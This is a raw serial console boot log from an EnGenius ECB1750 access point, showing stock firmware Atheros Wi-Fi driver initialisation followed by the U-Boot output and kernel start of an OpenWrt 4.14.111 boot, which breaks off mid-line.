Bridge firewalling registered [ 1.250000] 8021q: 802.1Q VLAN Support v1.8 [ 1.260000] VFS: Mounted root (squashfs filesystem) readonly on device 31:3. [ 1.270000] Freeing unused kernel memory: 212k freed - preinit - Press the [f] key and hit [enter] to enter failsafe mode [ 6.170000] eth0: link up (1000Mbps/Full duplex) - regular preinit - [ 6.350000] JFFS2 notice: (434) jffs2_build_xattr_subsystem: complete building xattr subsystem, 1 of xdatum (0 unchecked, 0 orphan) and 19 of xref (0 dead, 2 orphan) found. switching to jffs2 - init - [ 6.420000] eth0: link down Please press Enter to activate this console. [ 7.900000] NET: Registered protocol family 10 [ 8.010000] asf: module license 'Proprietary' taints kernel. [ 8.010000] Disabling lock debugging due to kernel taint [ 8.030000] ****Address of trace_timer :8702a610 [ 8.330000] ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D) [ 8.350000] ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved [ 8.370000] ath_dfs: Version 2.0.0 [ 8.370000] Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved [ 8.520000] ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved [ 10.610000] __ath_attach: Set global_scn[0] [ 10.620000] Enterprise mode: 0x23fc0000 [ 10.630000] Restoring Cal data from DRAM [ 10.630000] [ 10.630000] ART Version : 10.347 [ 10.630000] SW Image Version : 0.20.-30.2.5 [ 10.640000] Board Revision : 6 [ 10.640000] ar9300_attach: nf_2_nom -110 nf_2_max -60 nf_2_min -125 [ 10.650000] [ 10.650000] [5G A/N] scn_handle->scn_disable_band=1,[0,0,0,1] [ 10.660000] Green-AP : Green-AP : Attached [ 10.660000] [ 10.670000] ath_get_caps[6195] rx chainmask mismatch actual 7 sc_chainmak 0 [ 10.680000] ath_get_caps[6170] tx chainmask mismatch actual 7 sc_chainmak 0 [ 10.680000] ath_attach_dfs[12718] dfsdomain 1 [ 10.700000] wifi0: Atheros ???: mem=0xb8100000, irq=47 [ 10.710000] ath_pci: SmartAntenna-DRT-0.1 (Atheros/multi-bss) [ 10.720000] ath_pci_probe [ 10.720000] PCI device id is 003c :003c [ 10.720000] ath_pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit] [ 10.730000] PCI: Enabling device 0000:00:00.0 (0000 -> 0002) [ 10.740000] ath_pci 0000:00:00.0: ath DEBUG: sc=0x87ac9600 [ 10.740000] [ 10.740000] ol_ath_pci_configure : num_desired MSI set to 0 [ 10.750000] [ 10.750000] Using PCI Legacy Interrupt [ 11.750000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057400 [ 11.750000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057800 [ 11.770000] __ol_ath_attach: ath_attach TODO [ 11.770000] __ol_ath_attach: dev name wifi1 [ 11.780000] ol_ath_set_default_tgt_config : AC Minfree buffer allocation through module param (umac.ko) [ 11.790000] OL_ACBKMinfree : 0 [ 11.790000] OL_ACBEMinfree : 0 [ 11.790000] OL_ACVIMinfree : 0 [ 11.800000] OL_ACVOMinfree : 0 [ 11.800000] ol_ath_attach() BMI inited. [ 11.810000] ol_ath_attach() BMI Get Target Info. [ 11.810000] ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c [ 11.820000] NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0 [ 11.820000] ol_ath_attach() configure Target . [ 11.830000] qc98xx_verify_checksum: flash checksum passed: 0xcab0 [ 11.830000] [ 11.830000] ========== ac_obey_reg_power = 0 [ 11.840000] qc98xx_verify_checksum: flash checksum passed: 0xe490 [ 11.840000] ol_transfer_bin_file 2337: Download DRAM data len 2116 [ 11.850000] ol_ath_download_firmware: cal_in_flash=0, ATH_DRAM_DATA_FILE status=0 [ 11.860000] Download AR9888v2_bin [ 11.870000] ol_transfer_bin_file 2193: Download Firmware data len 235576 [ 12.870000] ol_ath_attach() Download FW. [ 12.880000] ol_ath_attach() HT Create . [ 12.880000] ol_ath_attach() HIF Claim. [ 12.880000] ol_ath_attach() BMI Done. [ 12.890000] ol_ath_attach() WMI attached. wmi_handle 86300000 [ 12.890000] +HWT [ 12.900000] SOC_RESET_CONTROL_ADDRESS : 800 [ 12.900000] CPU_INTR_ADDRESS = [0] [ 12.900000] SOC_GLOBAL_RESET_ADDRESS = [0] [ 12.910000] Rx_Filter : [0] [ 12.910000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057400 [ 12.920000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057800 [ 12.920000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057c00 [ 12.930000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058000 [ 12.940000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058400 [ 12.950000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058800 [ 12.960000] CE_recv_buf_enqueue 654 Populate last entry 512 for CE 5 [ 12.960000] CE_recv_buf_enqueue 663 CE 5 wi 511 dest_ptr 0x5c9d040 nbytes 0 recv_ctxt 0x864729c0 [ 12.970000] Target:87171000 HTC Service:0x0001, ULpipe:0 DLpipe:1 id:0 Ready [ 12.980000] -HWT [ 12.980000] Target:87171000 HTC Service:0x0300, ULpipe:4 DLpipe:5 id:1 Ready [ 12.990000] HTC Service:0x0300 ep:1 TX flow control disabled [ 12.990000] CE_pkt_dl_len_set CE 4 Pkt download length 64 [ 13.000000] ol_txrx_pdev_attach: 1424 tx desc's allocated ; range starts from 85900000 [ 13.010000] Target:87171000 HTC Service:0x0100, ULpipe:3 DLpipe:2 id:2 Ready [ 13.020000] HTC Service:0x0100 ep:2 TX flow control disabled [ 13.020000] wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event [ 13.030000] num_rf_chain : 00000003 [ 13.030000] ht_cap_info: : 0000085b [ 13.040000] vht_cap_info : 338001b2 [ 13.040000] vht_supp_mcs : 0000ffea [ 13.040000] LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256, lteu_support 0 [ 13.050000] idx 0 req 1 num_units 0 num_unit_info 2 unit size 440 actual units 145 [ 13.060000] chunk 0 len 63800 requested ,ptr 0x5910000 [ 13.080000] FIRMWARE:P 145 V 16 T 443 [ 13.080000] [ 13.080000] FIRMWARE:_wlan_rtt_enable [ 13.090000] wmi_ready_event_rx: WMI UNIFIED READY event [ 13.090000] ol_ath_connect_htc() WMI is ready [ 13.100000] ol_ath_set_host_app_area TODO [ 13.100000] target uses HTT version 2.1; host uses 2.1 [ 13.110000] ol_ath_attach() connect HTC. [ 13.110000] bypasswmi : 0 [ 13.120000] ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0. [ 13.130000] [ 13.130000] [5G AC] scn_handle->scn_disable_band=1,[0,0,0,1] [ 13.140000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150 [ 13.140000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0 [ 13.150000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0 [ 13.160000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0 [ 13.160000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150 [ 13.170000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080 [ 13.180000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080 [ 13.190000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080 [ 13.190000] Add VHT80 channel: 5210 [ 13.200000] Add VHT80 channel: 5290 [ 13.200000] Add VHT80 channel: 5530 [ 13.200000] Add VHT80 channel: 5610 [ 13.210000] Add VHT80 channel: 5690 [ 13.210000] Add VHT80 channel: 5775 [ 13.220000] Skipping VHT80 channel 5825 [ 13.220000] ol_ath_phyerr_attach: called [ 13.220000] OL Resmgr Init-ed [ 13.230000] Green-AP : Green-AP : Attached [ 13.230000] [ 13.230000] Green-AP : Attached [ 13.240000] ol_if_dfs_setup: called [ 13.240000] ol_if_dfs_attach: called; ptr=858e5974, radar_info=8707db70 [ 13.250000] ol_ath_rtt_meas_report_attach: called [ 13.250000] ol_ath_attach() UMAC attach . [ 13.260000] ol_if_dfs_configure: called [ 13.260000] ol_if_dfs_configure: FCC domain [ 13.260000] ol_if_dfs_disable: called [ 13.270000] ol_ath_attach: Calling ol_if_dfs_configure [ 13.270000] __ol_ath_attach: init tx/rx TODO [ 13.280000] __ol_ath_attach: hard_header_len reservation 58 [ 13.500000] nf_conntrack version 0.5.0 (1976 buckets, 7904 max) [ 13.730000] xt_time: kernel timezone is -0000 [ 13.840000] ip6_tables: (C) 2000-2006 Netfilter Core Team [ 13.890000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x3, 0x1e, 0x460, 0x460, 0x0 ) [ 13.900000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x12, 0x1e, 0x460, 0x460, 0x0 ) [ 13.910000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x45, 0x1e, 0x460, 0x460, 0x0 ) [ 13.920000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x67, 0x1e, 0x460, 0x460, 0x0 ) [ 13.930000] [wifi1] FWLOG: [21779] WHAL_ERROR_RECV_STOPPCU ( 0x110298a, 0x3 ) [ 13.930000] [wifi1] FWLOG: [21779] WHAL_ERROR_RESET_PM ( ) [ 13.940000] [wifi1] FWLOG: [21786] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 13.950000] [wifi1] FWLOG: [21978] ANI Enable: 1 [ 13.950000] [wifi1] FWLOG: [21985] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 23.100000] ADDRCONF(NETDEV_UP): eth0: link is not ready [ 23.120000] device eth0 entered promiscuous mode [ 23.120000] ADDRCONF(NETDEV_UP): br-lan: link is not ready [ 23.300000] eth0: link up (1000Mbps/Full duplex) [ 23.300000] br-lan: port 1(eth0) entered forwarding state [ 23.310000] br-lan: port 1(eth0) entered forwarding state [ 23.310000] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready [ 23.330000] ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready [ 27.320000] br-lan: port 1(eth0) entered forwarding state hsy:debug: 0 [ 28.240000] Suspending Target - with disable_intr set :wifi1 (sc 87ac9600) [ 28.240000] waiting for target paused event from target :wifi1 (sc 87ac9600) [ 28.250000] __ol_ath_detach: init tx/rx cleanup TODO [ 28.260000] ol_if_dfs_teardown: called [ 28.260000] ol_ath_phyerr_detach: called [ 28.270000] CE_fini 2205 Cleaning up HTT Tx CE [ 28.270000] CE_fini Cleaning up HTT MSG CE(5) [ 28.280000] Green-AP : Green-AP : Detached [ 28.280000] [ 28.280000] Green-AP : Detached [ 28.290000] ath_pci_warm_reset :(sc 87ac9600) [ 28.290000] Target Warm Reset [ 28.290000] Host Intr Cause reg 0x900c : value : 0x4000 [ 28.300000] Target CPU Intr Cause 0x5040 [ 28.400000] addr 0x4050 : 0x4 [ 28.430000] Target CPU Intr Cause after CE reset 0x40 [ 28.430000] RESET_CONTROL after cpu warm reset 0x800 [ 28.540000] Target Warm reset complete [ 28.540000] ath_pci_remove [ 28.560000] Green-AP : Green-AP : Detached [ 28.560000] [ 28.580000] Removing athdebug proc file [ 28.590000] ath_dev: driver unloaded [ 28.600000] ath_dfs: driver unloaded [ 28.620000] ath_rate_atheros: driver unloaded [ 28.640000] ath_hal: driver unloaded [ 32.400000] ****Address of trace_timer :8640e610 [ 34.500000] ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D) [ 34.530000] ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved [ 34.550000] ath_dfs: Version 2.0.0 [ 34.550000] Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved [ 34.580000] ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved [ 36.760000] __ath_attach: Set global_scn[0] [ 36.770000] Enterprise mode: 0x23fc0000 [ 36.780000] Restoring Cal data from DRAM [ 36.780000] [ 36.780000] ART Version : 10.347 [ 36.790000] SW Image Version : 0.20.-30.2.5 [ 36.790000] Board Revision : 6 [ 36.790000] ar9300_attach: nf_2_nom -110 nf_2_max -60 nf_2_min -125 [ 36.800000] [ 36.800000] [5G A/N] scn_handle->scn_disable_band=1,[0,0,0,1] [ 36.810000] Green-AP : Green-AP : Attached [ 36.810000] [ 36.820000] ath_get_caps[6195] rx chainmask mismatch actual 7 sc_chainmak 0 [ 36.830000] ath_get_caps[6170] tx chainmask mismatch actual 7 sc_chainmak 0 [ 36.840000] ath_attach_dfs[12718] dfsdomain 1 [ 36.860000] wifi0: Atheros ???: mem=0xb8100000, irq=47 [ 36.860000] ath_pci: SmartAntenna-DRT-0.1 (Atheros/multi-bss) [ 36.870000] ath_pci_probe [ 36.870000] PCI device id is 003c :003c [ 36.870000] ath_pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit] [ 36.880000] ath_pci 0000:00:00.0: ath DEBUG: sc=0x87ad1e00 [ 36.890000] [ 36.890000] ol_ath_pci_configure : num_desired MSI set to 0 [ 36.900000] [ 36.900000] Using PCI Legacy Interrupt [ 37.900000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057400 [ 37.900000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057800 [ 37.920000] __ol_ath_attach: ath_attach TODO [ 37.920000] __ol_ath_attach: dev name wifi1 [ 37.930000] ol_ath_set_default_tgt_config : AC Minfree buffer allocation through module param (umac.ko) [ 37.940000] OL_ACBKMinfree : 0 [ 37.940000] OL_ACBEMinfree : 0 [ 37.950000] OL_ACVIMinfree : 0 [ 37.950000] OL_ACVOMinfree : 0 [ 37.950000] ol_ath_attach() BMI inited. [ 37.960000] ol_ath_attach() BMI Get Target Info. [ 37.960000] ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c [ 37.970000] NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0 [ 37.970000] ol_ath_attach() configure Target . [ 37.980000] qc98xx_verify_checksum: flash checksum passed: 0xcab0 [ 37.980000] [ 37.980000] ========== ac_obey_reg_power = 1 [ 37.990000] ol_transfer_bin_file 2337: Download DRAM data len 2116 [ 38.000000] ol_ath_download_firmware: cal_in_flash=0, ATH_DRAM_DATA_FILE status=0 [ 38.010000] Download AR9888v2_bin [ 38.010000] ol_transfer_bin_file 2193: Download Firmware data len 235576 [ 39.040000] ol_ath_attach() Download FW. [ 39.040000] ol_ath_attach() HT Create . [ 39.040000] ol_ath_attach() HIF Claim. [ 39.050000] ol_ath_attach() BMI Done. [ 39.050000] ol_ath_attach() WMI attached. wmi_handle 85bd0000 [ 39.060000] +HWT [ 39.060000] SOC_RESET_CONTROL_ADDRESS : 800 [ 39.060000] CPU_INTR_ADDRESS = [0] [ 39.070000] SOC_GLOBAL_RESET_ADDRESS = [0] [ 39.070000] Rx_Filter : [80200] [ 39.070000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057400 [ 39.080000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057800 [ 39.090000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057c00 [ 39.100000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058000 [ 39.100000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058400 [ 39.110000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058800 [ 39.120000] CE_recv_buf_enqueue 654 Populate last entry 512 for CE 5 [ 39.120000] CE_recv_buf_enqueue 663 CE 5 wi 511 dest_ptr 0x67d5040 nbytes 0 recv_ctxt 0x87be9180 [ 39.130000] Target:85b02000 HTC Service:0x0001, ULpipe:0 DLpipe:1 id:0 Ready [ 39.140000] -HWT [ 39.140000] Target:85b02000 HTC Service:0x0300, ULpipe:4 DLpipe:5 id:1 Ready [ 39.150000] HTC Service:0x0300 ep:1 TX flow control disabled [ 39.160000] CE_pkt_dl_len_set CE 4 Pkt download length 64 [ 39.160000] ol_txrx_pdev_attach: 1424 tx desc's allocated ; range starts from 87210000 [ 39.170000] Target:85b02000 HTC Service:0x0100, ULpipe:3 DLpipe:2 id:2 Ready [ 39.180000] HTC Service:0x0100 ep:2 TX flow control disabled [ 39.190000] wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event [ 39.190000] num_rf_chain : 00000003 [ 39.200000] ht_cap_info: : 0000085b [ 39.200000] vht_cap_info : 338001b2 [ 39.200000] vht_supp_mcs : 0000ffea [ 39.210000] LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256, lteu_support 0 [ 39.210000] idx 0 req 1 num_units 0 num_unit_info 2 unit size 440 actual units 145 [ 39.220000] chunk 0 len 63800 requested ,ptr 0x7220000 [ 39.240000] FIRMWARE:P 145 V 16 T 443 [ 39.240000] [ 39.240000] FIRMWARE:_wlan_rtt_enable [ 39.250000] wmi_ready_event_rx: WMI UNIFIED READY event [ 39.250000] ol_ath_connect_htc() WMI is ready [ 39.260000] ol_ath_set_host_app_area TODO [ 39.260000] target uses HTT version 2.1; host uses 2.1 [ 39.270000] ol_ath_attach() connect HTC. [ 39.280000] bypasswmi : 0 [ 39.280000] ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0. [ 39.290000] [ 39.290000] [5G AC] scn_handle->scn_disable_band=1,[0,0,0,1] [ 39.300000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150 [ 39.310000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0 [ 39.310000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0 [ 39.320000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0 [ 39.330000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150 [ 39.330000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080 [ 39.340000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080 [ 39.350000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080 [ 39.360000] Add VHT80 channel: 5210 [ 39.360000] Add VHT80 channel: 5290 [ 39.360000] Add VHT80 channel: 5530 [ 39.370000] Add VHT80 channel: 5610 [ 39.370000] Add VHT80 channel: 5690 [ 39.370000] Add VHT80 channel: 5775 [ 39.380000] Skipping VHT80 channel 5825 [ 39.380000] ol_ath_phyerr_attach: called [ 39.390000] OL Resmgr Init-ed [ 39.390000] Green-AP : Green-AP : Attached [ 39.390000] [ 39.400000] Green-AP : Attached [ 39.400000] ol_if_dfs_setup: called [ 39.400000] ol_if_dfs_attach: called; ptr=856ad974, radar_info=87025b70 [ 39.410000] ol_ath_rtt_meas_report_attach: called [ 39.410000] ol_ath_attach() UMAC attach . [ 39.420000] ol_if_dfs_configure: called [ 39.420000] ol_if_dfs_configure: FCC domain [ 39.430000] ol_if_dfs_disable: called [ 39.430000] ol_ath_attach: Calling ol_if_dfs_configure [ 39.440000] __ol_ath_attach: init tx/rx TODO [ 39.440000] __ol_ath_attach: hard_header_len reservation 58 [ 39.790000] [ 39.790000] [5G AC] scn_handle->scn_disable_band=9,[1,0,0,1] [ 39.800000] isCountryCodeValid: EEPROM regdomain 0x0 [ 39.800000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150 [ 39.810000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0 [ 39.810000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0 [ 39.820000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0 [ 39.830000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150 [ 39.840000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080 [ 39.840000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080 [ 39.850000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080 [ 39.860000] Add VHT80 channel: 5210 [ 39.860000] Add VHT80 channel: 5290 [ 39.870000] Add VHT80 channel: 5530 [ 39.870000] Add VHT80 channel: 5610 [ 39.870000] Add VHT80 channel: 5690 [ 39.880000] Add VHT80 channel: 5775 [ 39.880000] Skipping VHT80 channel 5825 [ 40.020000] ath_ioctl: SIOC80211IFCREATE CALLED [ 40.020000] wmi_unified_vdev_create_send: ID = 0 VAP Addr = 88:dc:96:39:d9:a3: [ 40.030000] Setting dscp for vap id: 0 [ 40.030000] VAP device ath1 created osifp: (87173380) os_if: (858a0000) [ 40.050000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x3, 0x1e, 0x460, 0x460, 0x0 ) [ 40.060000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x12, 0x1e, 0x460, 0x460, 0x0 ) [ 40.070000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x45, 0x1e, 0x460, 0x460, 0x0 ) [ 40.080000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x67, 0x1e, 0x460, 0x460, 0x0 ) [ 40.090000] [wifi1] FWLOG: [48569] WHAL_ERROR_RECV_STOPPCU ( 0x110298a, 0x3 ) [ 40.100000] [wifi1] FWLOG: [48569] WHAL_ERROR_RESET_PM ( ) [ 40.100000] [wifi1] FWLOG: [48576] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 40.110000] [wifi1] FWLOG: [48768] ANI Enable: 1 [ 40.110000] [wifi1] FWLOG: [48776] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 40.120000] [wifi1] FWLOG: [49278] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 40.130000] [wifi1] FWLOG: [49286] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 40.140000] Set freq vap 0 stop send + 858a0000 [ 40.150000] OL vap_stop + [ 40.150000] wmi_unified_vdev_stop_send for vap 0 (85bd0000) [ 40.160000] OL vap_stop - [ 40.160000] STOPPED EVENT for vap 0 (85bd0000) [ 40.160000] Set freq vap 0 stop send -858a0000 [ 40.300000] Set wait done --858a0000 hsy:preset 11k (ath1) to disable [ 40.360000] ol_ath_desc_alloc_and_mark_for_mcast_clone: VAP Mcast to Unicast buffer allocated: 400 [ 40.370000] ol_ath_vap_set_param: VAP param is now supported param:67 value:2 [ 40.430000] [ 40.430000] DES SSID SET= [ 40.440000] [ 40.440000] DES SSID SET=EnGenius39D9A3_1-5GHz [ 40.870000] device ath1 entered promiscuous mode [ 41.050000] [wifi1] FWLOG: [49774] RATE: NEW NSS 3 [ 41.060000] [ 41.600000] OL vap_stop + [ 41.600000] wmi_unified_vdev_stop_send for vap 0 (85bd0000) [ 41.600000] OL vap_stop - [ 41.610000] STOPPED EVENT for vap 0 (85bd0000) [ 41.740000] wmi_unified_scan_start_send for vap 0 (85bd0000) [ 41.740000] br-lan: port 2(ath1) entered forwarding state [ 41.750000] br-lan: port 2(ath1) entered forwarding state [ 41.750000] 8021q: adding VLAN 0 to HW filter on device ath1 [ 44.440000] OL vap_start + [ 44.450000] wmi_unified_vdev_start_send for vap 0 (85bd0000) [ 44.450000] OL vap_start - [ 44.460000] ol_vdev_start_resp_ev for vap 0 (85bd0000) [ 44.460000] ol_ath_vap_join: join operation is only for STA/IBSS mode [ 44.470000] ol_ath_wmm_update: [ 44.470000] [ 44.470000] ieee80211_dfs_cac_start = 1 [ 44.480000] wmi_unified_vdev_up_send for vap 0 (85bd0000) [ 44.480000] Notification to UMAC VAP layer [ 45.760000] br-lan: port 2(ath1) entered forwarding state [ 46.130000] ath_attach_dfs[12718] dfsdomain 1 [ 46.160000] [ 46.160000] [5G A/N] scn_handle->scn_disable_band=9,[1,0,0,1] [ 46.220000] DCS for CW interference mitigation: 0 [ 46.220000] DCS for WLAN interference mitigation: 0 [ 46.240000] VAP device ath0 created osifp: (864dcb80) os_if: (872e8000) [ 46.260000] Set freq vap 0 stop send + 872e8000 [ 46.270000] Set freq vap 0 stop send -872e8000 [ 46.400000] Set wait done --872e8000 hsy:preset 11k (ath0) to disable [ 46.510000] [ 46.510000] DES SSID SET= [ 46.520000] [ 46.520000] DES SSID SET=EnGenius39D9A2_1-2.4GHz [ 46.960000] device ath0 entered promiscuous mode [ 47.850000] br-lan: port 3(ath0) entered forwarding state [ 47.850000] br-lan: port 3(ath0) entered forwarding state [ 47.870000] 8021q: adding VLAN 0 to HW filter on device ath0 [ 50.220000] [ 50.220000] ieee80211_dfs_cac_start = 1 [ 50.290000] [ 50.290000] ieee80211_dfs_cac_start = 1 [ 50.300000] [ 50.300000] ieee80211_dfs_cac_start = 1 [ 51.060000] [wifi1] FWLOG: [60212] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 ) [ 51.060000] [wifi1] FWLOG: [60212] WAL_DBGID_DEV_TX_TIMEOUT ( 0x9 ) [ 51.860000] br-lan: port 3(ath0) entered forwarding state
OpenWrt bootlog
U-Boot 1.1.4 (v1.0.0) (Nov 6 2014 - 12:56:32) ECB1200_1750 - Scorpion 1.0DRAM: sri Scorpion 1.0 ath_ddr_initial_config(200): (32bit) ddr2 init tap = 0x00000003 Tap (low, high) = (0x4, 0x1c) Tap values = (0x10, 0x10, 0x10, 0x10) 128 MB Top of RAM usable for U-Boot at: 88000000 Reserving 216k for U-Boot at: 87fc8000 Reserving 192k for malloc() at: 87f98000 Reserving 44 Bytes for Board Info at: 87f97fd4 Reserving 36 Bytes for Global Data at: 87f97fb0 Reserving 128k for boot params() at: 87f77fb0 Stack Pointer at: 87f77f98 Now running in RAM - U-Boot at: 87fc8000 Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18 flash size 16MB, sector count = 256 Flash: 16 MB *** Warning *** : 2nd PCIe WLAN Module not found !!! In: serial Out: serial Err: serial Net: ath_gmac_enet_initialize... athrs_sgmii_res_cal: cal value = 0x1 Fetching MAC Address from 0x87feb810 ath_gmac_enet_initialize: reset mask:c02200 Scorpion ----> AR8035 PHY * AR8035 PHY init : cfg1 0xf cfg2 0x7135 eth0: 88:dc:96:11:22:fe ATHR8035_PHY: Phy 5, Neg Success ATHR8035_PHY: unit 0 phy addr 5 eth0 up eth0 Setting 0x18116290 to 0x58b1a14f Hit any key to stop autoboot: 0 ## Booting image at 9f050000 ... Image Name: MIPS OpenWrt Linux-4.14.111 Created: 2019-04-15 11:33:59 UTC Image Type: MIPS Linux Kernel Image (lzma compressed) Data Size: 1615111 Bytes = 1.5 MB Load Address: 80060000 Entry Point: 80060000 Verifying Checksum at 0x9f050040 ...OK Uncompressing Kernel Image ... OK No initrd ## Transferring control to Linux (at address 80060000) ... ## Giving linux memsize in bytes, 134217728 Starting kernel ... [ 0.000000] Linux version 4.14.111 (sven@debian) (gcc version 7.4.0 (OpenWrt GCC 7.4.0 r9733+22-e1444ab59c)) #0 Mon Apr 15 11:33:59 2019 [ 0.000000] bootconsole [early0] enabled [ 0.000000] CPU0 revision is: 00019750 (MIPS 74Kc) [ 0.000000] MIPS: machine is EnGenius ECB1750 [ 0.000000] SoC: Qualcomm Atheros QCA9558 ver 1 rev 0 [ 0.000000] Determined physical RAM map: [ 0.000000] memory: 08000000 @ 00000000 (usable) [ 0.000000] Initrd not found or empty - disabling initrd [ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. [ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes [ 0.000000] Zone ranges: [ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff] [ 0.000000] Movable zone start for each node [ 0.000000] Early memory node ranges [ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff] [ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff] [ 0.000000] random: get_random_bytes called from start_kernel+0x8c/0x474 with crng_init=0 [ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32512 [ 0.000000] Kernel command line: console=ttyS0,115200n8 rootfstype=squashfs,jffs2 [ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes) [ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes) [ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) [ 0.000000] Writing ErrCtl register=00000000 [ 0.000000] Readback ErrCtl register=00000000 [ 0.000000] Memory: 123184K/131072K available (3777K kernel code, 151K rwdata, 912K rodata, 1232K init, 204K bss, 7888K reserved, 0K cma-reserv ed) [ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 [ 0.000000] NR_IRQS: 51 [ 0.000000] CPU clock: 720.000 MHz [ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 5309056796 ns [ 0.000007] sched_clock: 32 bits at 360MHz, resolution 2ns, wraps every 5965232126ns [ 0.008291] Calibrating delay loop... 358.80 BogoMIPS (lpj=1794048) [ 0.074984] pid_max: default: 32768 minimum: 301 [ 0.080065] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.087102] 